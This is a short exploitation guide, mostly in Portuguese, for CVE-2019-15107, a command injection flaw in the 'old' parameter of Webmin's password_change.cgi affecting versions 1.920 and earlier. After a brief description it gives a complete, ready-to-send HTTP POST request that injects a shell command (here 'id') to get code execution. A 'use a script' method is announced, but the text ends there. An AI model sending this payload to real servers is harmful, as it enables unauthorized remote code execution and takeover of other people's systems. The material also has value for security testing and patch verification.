CVE-2019-15107: Exploit Modules Available for Remote Code Execution Vulnerability in Webmin
- Descrição da vulnerabilidade
O Webmin é uma ferramenta de gerenciamento baseada em Web, poderosa e amplamente usada em sistemas Unix. Durante o processamento da requisição em Password_Change.cgi, o parâmetro old apresenta uma vulnerabilidade de injeção de comando, que pode ser explorada maliciosamente por atacantes. Quando o usuário ativa a função de redefinição de senha do Webmin, um atacante pode usar essa vulnerabilidade para executar comandos arbitrários no sistema afetado, obtendo assim o shell do sistema.
Versões afetadas:
Webmin 1.920 e versões anteriores
- Exploração
Método 1: Verificação manual
Acesse a página, ignore o certificado e você verá a página de login do Webmin.

Envie o seguinte pacote de dados para executar o comando id:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

Método 2: Usando script
